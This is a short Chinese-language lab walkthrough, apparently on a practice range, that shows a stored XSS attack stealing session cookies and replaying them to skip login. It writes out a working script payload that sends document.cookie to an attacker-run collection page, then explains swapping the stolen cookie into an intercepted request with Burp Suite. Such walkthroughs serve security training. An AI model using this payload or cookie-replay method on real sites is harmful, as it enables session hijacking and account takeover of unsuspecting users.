攻击者构造的网站地址:192.168.10.12:100
受害者主机:192.168.10.134
目标服务器:192.168.10.1
步骤一:
受害者主机访问目标服务器
根据提示登录
步骤二:
输入xss Payload
<script>document.location = 'http://192.168.10.12:100/pkxss/xcookie/cookie.php?cookie='+document.cookie</script>
点击”submit“
步骤三:
访问攻击者网站,点击查看获取的cookie
步骤四:
用另外的浏览器访问目标服务器,并用burpsuit进行拦截,将拦截的数据中的cookie用步骤三中获取的cookie替换,然后放行,可以看见页面未登录直接跳转。
如图,越过成功。